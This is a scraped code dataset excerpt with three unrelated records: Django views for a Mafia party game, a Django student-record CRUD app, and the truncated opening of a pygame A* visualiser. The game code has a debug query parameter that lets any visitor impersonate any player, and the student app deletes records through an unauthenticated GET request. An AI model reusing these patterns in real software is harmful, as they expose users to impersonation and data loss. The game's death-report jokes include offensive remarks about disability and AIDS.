\"mafia_kills_shared\": {\"description\": \"Mafia can see who their team mates are trying to assasinate (if they refresh the page)\"},\n \"show_suspicion_pc_on_death\": {\"description\": \"When a player is killed their correct % suspicion is shared with everyone\"},\n #\"shot_clock\": {\"description\": \"Slowest player in the round has 30 seconds to act or their choice is set to None\"},\n}\n\ndef home(request):\n context = {}\n return render(request, 'matthews/home.html', context)\n\n\ndef new_game(request):\n game = Game()\n game.save()\n\n if 'continue' in request.GET:\n old_game_id = request.session['game_id']\n old_game = Game.objects.get(id=old_game_id)\n old_game.next_game = game\n old_game.save()\n game.options = old_game.options\n game.save()\n name = old_game.players.first().name\n else:\n name = request.GET['leader']\n return join(request, game.id, name, True)\n\n\ndef make_invite_hash(game_id, name):\n cleartext = str(game_id) + 'invite_hash' + name + settings.SECRET_KEY\n return hashlib.md5(cleartext.encode('utf-8')).hexdigest()\n\n\ndef make_invite_url(game_id, name):\n kwargs = {'id': game_id, 'name': name, 'hash': make_invite_hash(game_id, name)}\n return settings.BASE_URL + reverse('matthews:join', kwargs=kwargs)\n\n\ndef invite(request, id):\n game = Game.objects.get(id=id)\n\n if game.date_started:\n messages.add_message(request, messages.WARNING, \"Can't invite new players the game has started\")\n return HttpResponseRedirect(reverse('matthews:game'))\n\n if request.method == \"POST\":\n player_list = request.POST['name_and_email']\n\n if game.date_started:\n raise Exception(\"This game has already started, blame {}\".format(game.players.first().name))\n\n for name, email in (x.split(',') for x in player_list.split('\\n')):\n name = name.strip()\n email = email.strip()\n url = make_invite_url(id, name)\n msg = \"Join game {}\".format(url)\n if '@' in email:\n send_email([email], 'Join Matthews Game', html_content=msg, text_content=msg)\n elif not Player.objects.filter(game=game, name=name).first():\n player = Player(name=name, game=game)\n player.save()\n messages.add_message(request, messages.INFO, 'Player {} invited by email with {}'.format(name, url))\n\n return HttpResponseRedirect(reverse('matthews:invite', kwargs={'id': game.id}))\n\n context = {\n 'game': game,\n 'players': game.players.all(),\n 'my_player': Player.objects.filter(id=request.session.get('player_id')).first(),\n }\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef join(request, id, name, hash):\n game = Game.objects.get(id=id)\n\n if hash != True and hash != make_invite_hash(game.id, name):\n messages.add_message(request, messages.INFO, \"The link you follwed is invalid, please check and retry\")\n return HttpResponseRedirect(reverse('matthews:home'))\n\n player = Player.objects.filter(game=game, name=name).first()\n if not player:\n if game.date_started:\n messages.add_message(request, messages.INFO, \"That game has already started so you can't join\")\n return HttpResponseRedirect(reverse('matthews:home'))\n\n player = Player(name=name, game=game)\n player.save()\n\n request.session['game_id'] = game.id\n request.session['player_id'] = player.id\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef update_options(request):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only leader can update game options')\n\n if game.date_started:\n raise Exception('Can\\'t 
update options for a game which has started')\n\n if 'reset' in request.POST:\n game.options = None\n game.save()\n\n else:\n roles = {int(id): {'min': int(request.POST.get('min_'+id)),\n 'pc': int(request.POST.get('pc_'+id))\n }\n for id in request.POST.getlist('character_ids[]')}\n\n game.options = {\n 'roles': roles,\n 'gameplay': [x for x in request.POST.getlist('game_options[]')],\n }\n game.save()\n\n if 'start' in request.POST:\n return start(request)\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef remove_player(request, id):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only leader can remove players')\n\n if game.date_started:\n raise Exception('Can\\'t remove players from a game which has started')\n\n player = Player.objects.get(id=id, game=game)\n player.delete()\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef restart(request):\n game = Game.objects.get(id=request.session['game_id'])\n for player in game.players.all():\n player.actions_by.all().delete()\n player.died_in_round = None\n player.character = None\n player.save()\n game.date_started = None\n game.save()\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef restart_round(request, round):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only the leader can reset rounds')\n\n Action.objects.filter(done_by__game=game, round__gte=round).delete()\n for player in Player.objects.filter(game=game, died_in_round__gte=round):\n player.died_in_round = None\n player.save()\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef start(request):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only the first player in the game can start it')\n\n rng = random.Random()\n num_players = game.players.count()\n\n\n def probabilistic_round(float):\n \"\"\" rounds a value up or down based on its decimal part, eg 2.9 -> 3 90% of the time \"\"\"\n return int(float) + int(rng.random() < float % 1)\n\n character_ids = []\n for character_id, options in game.options.get('roles').items():\n character_ids += [int(character_id)] * max(options['min'], probabilistic_round(num_players * options['pc'] / 100))\n\n character_ids += [CIVILIAN_ID] * (num_players - len(character_ids))\n\n random.Random().shuffle(character_ids)\n\n for player in game.players.all():\n player.character_id = character_ids.pop()\n player.save()\n\n game.date_started = datetime.now()\n game.save()\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef build_game_state(game):\n \"\"\" returns a string representing the state of the game \"\"\"\n action_ids = Action.objects.filter(done_by__game=game, round=calculate_round(game)) \\\n .order_by('-id').values_list('id')\n action_id_str = \"\".join([str(x[0]) for x in action_ids])\n if game.date_started:\n return \"{}-{}\".format(game.date_started, action_id_str)\n else:\n return \"{}-{}\".format(game.players.count(), hash(json.dumps(game.options)))\n\n\ndef state(request):\n game = Game.objects.get(id=request.session.get('game_id'))\n return HttpResponse(build_game_state(game))\n\n\ndef game(request):\n\n debug = request.GET.get('debug')\n if debug is not None:\n request.session['debug'] = int(debug)\n messages.add_message(request, 
messages.INFO, 'debug set to {}'.format(debug))\n return HttpResponseRedirect(reverse('matthews:game'))\n\n is_debug = request.session.get('debug', 0)\n play_as_id = request.GET.get('play_as_id')\n if is_debug and play_as_id:\n request.session['player_id'] = int(play_as_id)\n return HttpResponseRedirect(reverse('matthews:game'))\n\n game_id = request.session.get('game_id')\n if not game_id:\n messages.add_message(request, messages.INFO, \"You're not currently in any game, follow the link in the invite email to join one\")\n return HttpResponseRedirect(reverse('matthews:home'))\n game = Game.objects.get(id=game_id)\n round = calculate_round(game)\n my_player = Player.objects.filter(id=request.session.get('player_id')).first()\n\n if not my_player:\n messages.add_message(request, messages.INFO, 'Your player was kicked from the game')\n return HttpResponseRedirect(reverse('matthews:home'))\n\n i_am_dead = my_player.died_in_round is not None and my_player.died_in_round < round\n\n suspect = None\n if round % 2 == 0 and my_player.character_id == DETECTIVE_ID and not i_am_dead:\n investigation = Action.objects.filter(round=round-1, done_by=my_player).first()\n suspect = investigation.done_to if investigation else None\n\n players = game.players.all()\n\n\n default_roles = {\n MAFIA_ID: {'min': 1, 'pc': 25},\n DOCTOR_ID: {'min': 1, 'pc': 10},\n DETECTIVE_ID: {'min': 1, 'pc': 10},\n }\n\n role_options = game.options.get('roles') if game.options else default_roles\n # add in names to the char options array (as it's annoying to look them up in the template)\n role_options = {int(k): {**v, 'name': ROLE_NAMES[int(k)]}\n for k,v in role_options.items()}\n\n deaths = game.players.filter(died_in_round=round-1)\n\n endgame_type = get_endgame_type(game)\n bad_guy_ids = [MAFIA_ID]\n good_guy_ids = [CIVILIAN_ID, DOCTOR_ID, DETECTIVE_ID]\n day_regex = '^\\d*[02468]$'\n night_regex = '^\\d*[13579]$'\n if endgame_type is not None:\n was_alive_to_act = Q(actions_by__round__lte=F('died_in_round')) | Q(died_in_round__isnull=True)\n was_alive_to_be_acted_on = Q(actions_to__round__lte=F('died_in_round')) | Q(died_in_round__isnull=True)\n players = players.annotate(lynched_bad=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n actions_by__round__iregex=day_regex,\n actions_by__done_to__character_id__in=bad_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(lynched_good=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n actions_by__round__iregex=day_regex,\n actions_by__done_to__character_id__in=good_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_bad=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=bad_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_good=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=good_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_doctor=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id=DOCTOR_ID,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_detective=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n 
character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id=DETECTIVE_ID,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(lives_saved=Count('actions_by__round', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=DOCTOR_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__actions_to__done_by__character_id__in=bad_guy_ids,\n actions_by__done_to__actions_to__round=F('actions_by__round')))\n ).annotate(suspected_bad_pc=Cast(Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=CIVILIAN_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=bad_guy_ids)), FloatField())\n / Cast(Coalesce(F('died_in_round'), round) + 1 , FloatField())\n * 2 * 100\n ).annotate(successful_kill_pc=Cast(F('killed_good'), FloatField())\n / Cast(Coalesce(F('died_in_round') + 1, round) , FloatField())\n * 2 * 100\n # this doesn't seem to take into account if mafia was alive\n ).annotate(mafia_target=Count('actions_to', distinct=True,\n filter=Q(was_alive_to_be_acted_on,\n actions_to__round__iregex=night_regex,\n actions_to__done_by__character_id__in=bad_guy_ids))\n ).annotate(mafia_found=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=DETECTIVE_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=bad_guy_ids))\n )\n\n players = list(players)\n # todo - add extra params for awards, like so:\n # eg. players[2].favourite_person = \"James\"\n else:\n players = players.annotate(has_acted=Count('actions_by', filter=Q(actions_by__round=round)))\n players = list(players)\n\n current_actions = Action.objects.filter(done_by__game=game, round=round)\n # decorate players with an action if they have one for this round\n for player in players:\n for current_action in current_actions:\n if player.id == current_action.done_by_id:\n player.action = current_action\n\n if 'show_suspicion_pc_on_death' in game.options.get('gameplay', {}) and round > 1:\n for death in deaths:\n correct_actions = death.actions_by.filter(round__iregex=night_regex,\n round__lt=round,\n done_to__character_id__in=bad_guy_ids) \\\n .count()\n death.suspicion_pc = int(correct_actions / floor(round / 2) * 100)\n\n random.seed(game.id+round)\n\n alive_players = [x for x in players if x.died_in_round is None]\n my_player.is_leader = my_player.id == players[0].id\n context = {\n 'debug': is_debug,\n 'invite_url': make_invite_url(game.id, my_player.name),\n 'role_options': role_options,\n 'gameplay_options': GAMEPLAY_OPTIONS,\n 'game': game,\n 'round': round,\n 'is_day': round % 2 == 0,\n 'players': players,\n 'alive_players': alive_players,\n 'random_leader': random.choice(alive_players),\n 'my_player': my_player,\n 'my_action': Action.objects.filter(round=round, done_by=my_player).first(),\n 'num_actions': Action.objects.filter(round=round, done_by__game=game).count(),\n 'action_undone': request.GET.get('undone'),\n 'haunting_action': get_haunting_action(my_player, round),\n 'game_state': build_game_state(game),\n 'votes': Action.objects.filter(round=round-1, done_by__game=game) \\\n .filter(Q(done_by__died_in_round__gte=round-1) | Q(done_by__died_in_round__isnull=True)) \\\n .order_by('done_to'),\n 'deaths': deaths,\n 'death_report': make_death_report(deaths[0].name) if deaths else '',\n 'suspect': suspect,\n 'MAFIA_ID': MAFIA_ID,\n 'DOCTOR_ID': DOCTOR_ID,\n 'DETECTIVE_ID': DETECTIVE_ID,\n 'CIVILIAN_ID': CIVILIAN_ID,\n 'endgame_type': endgame_type,\n }\n\n if 
endgame_type and game.next_game_id:\n context.update({\n 'next_invite_url': make_invite_url(game.next_game.id, my_player.name),\n })\n return render(request, 'matthews/game.html', context)\n\n\ndef get_haunting_action(player, round):\n actions = Action.objects.filter(round=round-1, done_to=player, done_by__died_in_round__lt=round-1)\n if len(actions):\n return random.Random().choice(list(actions))\n\n\ndef make_death_report(name):\n templates = [\n [\n \"A [horrible,grim,ghastly,concerning,provocative,crazy,deeply unfortunate,regrettable,worrying,largely unexpected] \\\n incident at the [bakery,school,garden center,polio ward,RSPCA,nursing home,young offenders court,Tom Thumb home for tiny little boys] \\\n left {{name}} dead as [a dingbat,a doornail,Jimmy Saville,anything,a dodo,disco,can be].\",\n\n \"Locals came across [a frankly baffling,a deeply worrying,a seemingly unsolvable,an exciting,a disgusting,some kind of] mystery \\\n this morning when they discovered the body of {{name}} \\\n locked inside [a suitcase,a mini-bar,a chest freezer,a really big one of those trinket necklaces,a coal scuttle,their own mind].\",\n\n \"There was [chaos,pandemonium,a grim silence,a lot of tutting,an exchange of stern looks,a stampede,huge crowd,funky smell] \\\n at the [farmers' market,nail salon,corner by the square,edge of town,police cells,crack of dawn,AIDs parade,theatre matinee] this morning \\\n when {{name}}'s [head,arm,spine,severed right leg,spleen,limbless torso,still-sentient brain,decapitated head] was discovered \\\n floating in the [communal milk barrel,water tower,boating pond,second of Mrs Anderson's baths,shallowest puddle around,chef's stock pot].\",\n ],[\n \"[Police,First-responders,A young child,A hungry dog,One of those skinny runners you see,A travelling circus,The rugby sevens team,Celebrity Michael Sheen] \\\n found the body which had a [spatula,baked potato,half-complete Airfix kit,thicket of arrows,punt pole,sharpened leek,miniature version of the Eiffel Tower,number of swords,whole PlayStation controller,fencing foil] \\\n stuck into its [collarbone,clavicle,right temple,belly button,jugular,nose,squishy bits,back passage,mouth,toenail (but in a fatal fashion)]. 
\\\n They had lost a lot of blood.\",\n\n \"The cause of death was unknown \\\"Apart from \\\n [being dead,their pale colour,male-pattern baldness,a history of alcoholism,narcolepsy,all that acne,avoidable childhood obesity,their different-length legs,a ghastly taste in fashion,poor personal hygiene,misjudged attempts at humour,general unlikeability] \\\n they appeared to be [in peak physical condition,in general good health,in ripping health,in fine form,in roaring shape,fit as a fiddle,reasonably sound of mind,quite well off,newly sober]\\\", said \\\n [the coroner,the chief of police,Mrs Ronson from number 34,a chorus of doctors,Michael Burke,no one ever,the most qualified person we could find to interview].\",\n\n \"Authorities could only identify the body by its \\\n [winning smile,nubile physique,luscious sideburns,shoddy tattoos,expertly plucked eyebrows,one warty toe,overly complex genitalia,useless prehensile tail] \\\n and [Norway,penis,Mickey Mouse,heart,unfortunately,amusingly,nipple,upsettingly,Florida,star,not-quite-swastika]-shaped birth mark.\",\n ],[\n \"Our thoughts, prayers and [best wishes,cash prizes,minimal good will,fresh tears,suspicious glances,abject despair,sandwiches,mixed feelings] \\\n are with [the family,the whole world,no one in particular,their grieving widow,the concept of peace,in usual parameters,no clear target] at this difficult time.\",\n\n \"The deceased leaves behind their pet [dog,iguana,zebra,chincilla,rattlesnake,panda,goldfish,Chubby,flamingo,colony of ants who are each named,rock,thermos flask of dna] {{name}} Jr. \\\n and an unmoved [spouse,set of triplets,mother-in-law,universe,autistic daughter,collection of vintage baseball cards,tree,conjoined twin,tape worm colony].\",\n\n \"\\\"They were always into [hang-gliding,pot-holing,archery,other people's business,self-improvement,meditation,achieving one-ness,more debt than could ever be paid off,morbid cosplay,self-asphyxiation,weird shit]\\\", \\\n [a close friend,a passing cyclist,a disembodied voice,a street drunk,everyone we spoke to,the voice of time,a generic pundit,the local minister,someone special,their accountant,their one remaining friend,someone who didn't know them that well] \\\n remarked \\\"so I guess it's what they would have wanted\\\"\",\n ],\n ]\n\n report_lines = (re.sub(r'\\[(.*?)\\]',\n lambda m: random.choice(m.group(1).split(',')),\n random.choice(x).replace('{{name}}', name)\n )\n for x in templates)\n return \"\\n\".join(report_lines)\n\n\ndef target(request):\n game = Game.objects.get(id=request.session['game_id'])\n player = Player.objects.get(id=request.session['player_id'])\n round = calculate_round(game)\n\n game_url = reverse('matthews:game')\n\n if int(request.POST['round']) != round:\n # don't save a vote from a round that's already finished (e.g. 
a late ghost vote)\n        if player.died_in_round is None or player.died_in_round > round:\n            # but only show a warning if we think they've tried to vote a second time\n            msg = \"The voting for this round has closed - your last action was not counted.\"\n            messages.add_message(request, messages.WARNING, msg)\n    elif 'cancel' in request.POST:\n        action = Action.objects.filter(done_by=player, round=round)\n        action.delete()\n        game_url += '?undone=1'\n    else:\n        target = Player.objects.filter(id=request.POST['target']).first()\n\n        if target and target.game.id != game.id:\n            raise Exception(\"That player's not in this game\")\n        save_action(game, player, target)\n\n    return HttpResponseRedirect(game_url)\n\n\ndef test404(request):\n    raise Http404(\"Test: Not found\")\n\n\ndef test500(request):\n    raise Exception(\"Test: An error occurred\")\n\n\ndef calculate_round(game):\n    return floor(Action.objects.filter(done_by__game=game).count() / game.players.count())\n\n\ndef save_action(game, done_by, done_to):\n    round = calculate_round(game)\n    action = Action.objects.filter(round=round, done_by=done_by).first() \\\n             or Action(round=round, done_by=done_by)\n    action.done_to = done_to\n    action.save()\n\n    # Fill in blank actions for dead players who haven't acted so they don't hold up the game\n    non_voters = yet_to_vote(game, round)\n    if non_voters.count() == 0:\n        for corpse in yet_to_vote(game, round, False):\n            action = Action(round=round, done_by=corpse, done_to=None)\n            action.save()\n\n    if calculate_round(game) != round: # If this action completes a round of voting\n        victims = who_died(game, round)\n        for victim in victims:\n            victim.died_in_round = round\n            victim.save()\n\n\ndef yet_to_vote(game, round, is_alive=True):\n    \"\"\" Return a query identifying alive players who have not voted in this round\n    \"\"\"\n    return game.players.filter(died_in_round__isnull=is_alive) \\\n                       .exclude(actions_by__round=round)\n\n\ndef who_died(game, round):\n    \"\"\" returns a list of players who were killed by the actions of this round\n    \"\"\"\n\n    if round % 2 == 0: # process day vote\n        nominees = game.players.filter(actions_to__round=round,\n                                       actions_to__done_by__died_in_round__isnull=True) \\\n                               .annotate(votes=Count('actions_to')) \\\n                               .annotate(good_votes=Count('actions_to', filter=~Q(actions_to__done_by__character_id=MAFIA_ID))) \\\n                               .order_by('-votes')\n        nominee = nominees.first()\n        num_alive_players = game.players.exclude(died_in_round__isnull=False).count()\n        if nominee and ( nominee.votes > num_alive_players / 2 # Simple majority\n                        or nominee.good_votes == game.list_good_guys().count() # Good-guy consensus\n                       ):\n            return [nominee]\n\n    else: # process night actions\n        targets = game.players.filter(actions_to__round=round,\n                                      actions_to__done_by__died_in_round__isnull=True,\n                                      actions_to__done_by__character_id=MAFIA_ID) \\\n                              .annotate(votes=Count('actions_to')) \\\n                              .order_by('-votes')\n\n        if not targets.count():\n            return []\n        target = random.Random().choice(list(targets))\n\n        doctor_save_action = Action.objects.filter(done_by__game=game,\n                                                   round=round, done_to=target,\n                                                   done_by__character_id=DOCTOR_ID,\n                                                   done_by__died_in_round__isnull=True).first()\n\n        num_bad_guys = game.list_bad_guys().count()\n        num_good_guys = game.list_good_guys().count()\n        if num_bad_guys == num_good_guys and target.votes < num_bad_guys:\n            # reject a game-winning assassination if it's not done with consensus\n            return []\n\n        if target and not doctor_save_action:\n            return [target]\n        return []\n\n\ndef get_endgame_type(game):\n    \"\"\" returns 'bad' if bad guys win, 
'good' if good guys win else None \"\"\"\n if not game.date_started:\n return None\n\n players = game.players.filter(died_in_round__isnull=True)\n num_players = players.count()\n num_bad = game.list_bad_guys().count()\n num_good = game.list_good_guys().count()\n\n if num_bad == 0:\n return 'good'\n if num_bad > num_good:\n return 'bad'\n if num_bad == 1 and num_good == 1:\n return 'truce'\n return None\n\n\ndef cast_all(request):\n game = Game.objects.get(id=request.session['game_id'])\n round = calculate_round(game)\n non_voters = yet_to_vote(game, round)\n\n target = None #non_voters.first()\n for player in non_voters:\n save_action(game, player, target)\n\n return HttpResponseRedirect(reverse('matthews:game'))\n","repo_name":"jamespstrachan/matthews","sub_path":"src/matthews/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70271864211","text":"import json\nfrom datetime import datetime\n\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\n\nfrom app.models import BasicInfo\nfrom app.models import ExamArea\nfrom app.models import Faculty\nfrom app.models import Language\nfrom app.models import Nationality\nfrom app.models import Sex\n\n\ndef select_html(request):\n data = dict()\n\n # 前端数据\n select_number = request.GET.get('number', '')\n select_name = request.GET.get('name', '')\n select_sex = request.GET.get('sex', '')\n select_faculty = request.GET.get('faculty', '')\n select_class_name = request.GET.get('class_name', '')\n select_exam_area = request.GET.get('exam_area', '')\n select_into_date = request.GET.get('into_date', '')\n select_language = request.GET.get('language', '')\n select_nationality = request.GET.get('nationality', '')\n\n # 当前查询条件\n data['select_number'] = select_number\n data['select_name'] = select_name\n data['select_sex'] = select_sex\n data['select_faculty'] = select_faculty\n data['select_class_name'] = select_class_name\n data['select_exam_area'] = select_exam_area\n data['select_into_date'] = select_into_date\n data['select_language'] = select_language\n data['select_nationality'] = select_nationality\n\n # 下拉框\n data['faculty'] = Faculty.objects.values_list('name', flat=True)\n data['exam_area'] = ExamArea.objects.values_list('name', flat=True)\n data['language'] = Language.objects.values_list('name', flat=True)\n data['nationality'] = Nationality.objects.values_list('name', flat=True)\n data['sex'] = Sex.objects.values_list('name', flat=True)\n\n # 拼接查询条件\n q = Q()\n q.connector = 'AND'\n if select_number != '':\n q.children.append(('number', select_number))\n if select_name != '':\n q.children.append(('name', select_name))\n if select_sex != '':\n select_sex_obj = Sex.objects.filter(name=select_sex).first()\n q.children.append(('sex', select_sex_obj))\n if select_faculty != '':\n select_faculty_obj = Faculty.objects.filter(name=select_faculty).first()\n q.children.append(('faculty', select_faculty_obj))\n if select_class_name != '':\n q.children.append(('class_name', select_class_name))\n if select_exam_area != '':\n select_exam_area_obj = ExamArea.objects.filter(name=select_exam_area).first()\n q.children.append(('exam_area', select_exam_area_obj))\n if select_into_date != '':\n select_into_date_obj = datetime.strptime(select_into_date, '%Y-%m-%d')\n q.children.append(('into_date', select_into_date_obj))\n if select_language != 
'':\n        select_language_obj = Language.objects.filter(name=select_language).first()\n        q.children.append(('language', select_language_obj))\n    if select_nationality != '':\n        select_nationality_obj = Nationality.objects.filter(name=select_nationality).first()\n        q.children.append(('nationality', select_nationality_obj))\n\n    # Query the matching records\n    objects = BasicInfo.objects.filter(q)\n    all_data = list()\n    for one_object in objects:\n        one_data = dict()\n        one_data['number'] = one_object.number\n        one_data['name'] = one_object.name\n        one_data['sex'] = one_object.sex\n        one_data['faculty'] = one_object.faculty\n        one_data['class_name'] = one_object.class_name\n        one_data['exam_area'] = one_object.exam_area\n        one_data['into_date'] = one_object.into_date\n        one_data['language'] = one_object.language\n        one_data['birthday'] = one_object.birthday\n        one_data['nationality'] = one_object.nationality\n        one_data['grade'] = one_object.grade\n        one_data['email'] = one_object.email\n        all_data.append(one_data)\n    data['objects'] = all_data\n\n    return render(request, 'select.html', data)\n\n\ndef add_html(request):\n    data = dict()\n    data['faculty'] = Faculty.objects.values_list('name', flat=True)\n    data['exam_area'] = ExamArea.objects.values_list('name', flat=True)\n    data['language'] = Language.objects.values_list('name', flat=True)\n    data['nationality'] = Nationality.objects.values_list('name', flat=True)\n    data['sex'] = Sex.objects.values_list('name', flat=True)\n    return render(request, 'add.html', data)\n\n\n# Check whether a student number already exists\ndef exist_number(request):\n    ret = dict()\n    exist = 'exist'\n    number = request.GET['number']\n    try:\n        BasicInfo.objects.get(number=number)\n        ret[exist] = True\n    except Exception as e:\n        ret[exist] = False\n    return HttpResponse(json.dumps(ret), content_type=\"application/json\")\n\n\ndef add(request):\n    # Data posted from the frontend form\n    number = request.POST['number']\n    name = request.POST['name']\n    sex = request.POST['sex']\n    faculty = request.POST['faculty']\n    class_name = request.POST['class_name']\n    exam_area = request.POST['exam_area']\n    into_date = request.POST['into_date']\n    language = request.POST['language']\n    birthday = request.POST['birthday']\n    nationality = request.POST['nationality']\n    grade = request.POST['grade']\n    email = request.POST['email']\n\n    # Create the new record\n    add_obj = BasicInfo()\n    add_obj.number = number\n    add_obj.name = name\n    add_obj.sex = Sex.objects.filter(name=sex).first()\n    add_obj.faculty = Faculty.objects.filter(name=faculty).first()\n    add_obj.class_name = class_name\n    add_obj.exam_area = ExamArea.objects.filter(name=exam_area).first()\n    try:\n        into_date = datetime.strptime(into_date, '%Y-%m-%d')\n        add_obj.into_date = into_date\n    except Exception as e:\n        print('Failed to parse the enrolment date: {}'.format(e))\n    add_obj.language = Language.objects.filter(name=language).first()\n    try:\n        print('birthday:{}'.format(birthday))\n        birthday = datetime.strptime(birthday, '%Y-%m-%d')\n        add_obj.birthday = birthday\n    except Exception as e:\n        print('Failed to parse the date of birth: {}'.format(e))\n    add_obj.nationality = Nationality.objects.filter(name=nationality).first()\n    add_obj.grade = grade\n    add_obj.email = email\n    add_obj.save()\n\n    return redirect('/select.html')\n\n\ndef update_html(request):\n    data = dict()\n    number = request.GET['number']\n    obj = BasicInfo.objects.get(number=number)\n\n    # Query the current record by its number\n    data['current_number'] = obj.number\n    data['current_name'] = obj.name\n    data['current_sex'] = obj.sex\n    data['current_faculty'] = obj.faculty\n    data['current_class_name'] = obj.class_name\n    data['current_exam_area'] = obj.exam_area\n    data['current_into_date'] = 
str(obj.into_date)\n    data['current_language'] = obj.language\n    data['current_birthday'] = str(obj.birthday)\n    data['current_nationality'] = obj.nationality\n    data['current_grade'] = obj.grade\n    data['current_email'] = obj.email\n\n    # Dropdown options\n    data['faculty'] = Faculty.objects.values_list('name', flat=True)\n    data['exam_area'] = ExamArea.objects.values_list('name', flat=True)\n    data['language'] = Language.objects.values_list('name', flat=True)\n    data['nationality'] = Nationality.objects.values_list('name', flat=True)\n    data['sex'] = Sex.objects.values_list('name', flat=True)\n    return render(request, 'update.html', data)\n\n\ndef update(request):\n    # Data posted from the frontend form\n    number = request.POST['number']\n    name = request.POST['name']\n    sex = request.POST['sex']\n    faculty = request.POST['faculty']\n    class_name = request.POST['class_name']\n    exam_area = request.POST['exam_area']\n    into_date = request.POST['into_date']\n    language = request.POST['language']\n    birthday = request.POST['birthday']\n    nationality = request.POST['nationality']\n    grade = request.POST['grade']\n    email = request.POST['email']\n\n    update_obj = BasicInfo.objects.get(number=number)\n    update_obj.name = name\n    update_obj.sex = Sex.objects.filter(name=sex).first()\n    update_obj.faculty = Faculty.objects.filter(name=faculty).first()\n    update_obj.class_name = class_name\n    update_obj.exam_area = ExamArea.objects.filter(name=exam_area).first()\n    try:\n        into_date = datetime.strptime(into_date, '%Y-%m-%d')\n        update_obj.into_date = into_date\n    except Exception as e:\n        print('Failed to parse the enrolment date: {}'.format(e))\n    update_obj.language = Language.objects.filter(name=language).first()\n    try:\n        print('birthday:{}'.format(birthday))\n        birthday = datetime.strptime(birthday, '%Y-%m-%d')\n        update_obj.birthday = birthday\n    except Exception as e:\n        print('Failed to parse the date of birth: {}'.format(e))\n    update_obj.nationality = Nationality.objects.filter(name=nationality).first()\n    update_obj.grade = grade\n    update_obj.email = email\n    update_obj.save()\n\n    return redirect('/select.html')\n\n\ndef delete(request):\n    ids = request.GET['ids']\n    ids = ids.split(',')\n    ids.pop(len(ids) - 1)\n    for remove_id in ids:\n        BasicInfo.objects.get(number=remove_id).delete()\n    return redirect('/select.html')\n","repo_name":"rainbow-tan/rainbow","sub_path":"新生入学信息管理系统(django+sqllite或mysql)/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"23979301905","text":"import pygame\nimport math\nfrom queue import PriorityQueue\npygame.init()\n\nGRID_WIDTH = 800\nWIN_WIDTH = 1200\nROWS = 50 # should divide GRID_WIDTH without remainder\n\nWIN = pygame.display.set_mode((WIN_WIDTH, GRID_WIDTH))\npygame.display.set_caption(\"A* Path Finding Algorithm\")\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nPURPLE = (128, 0, 128)\nORANGE = (255, 165, 0)\nGREY = (128, 128, 128)\nTURQUOISE = (64, 224, 208)\nBAR = (250, 240, 230)\nCAPTION = (255, 127, 80)\nBARRIER = (139, 69, 19)\n\nclock = pygame.time.Clock()\n\nfont26 = pygame.font.SysFont(\"gillsans\", 26)\nfont18 = pygame.font.SysFont(\"arial.ttf\", 18)\nfont42 = pygame.font.SysFont(\"arial.ttf\", 42)\n\nclass Spot:\n\tdef __init__(self, row, col, width, total_rows):\n\t\tself.row = row\n\t\tself.col = col\n\t\tself.x = row * width\n\t\tself.y = col * width\n\t\tself.color = WHITE\n\t\tself.neighbors = []\n\t\tself.width = width\n\t\tself.total_rows = 
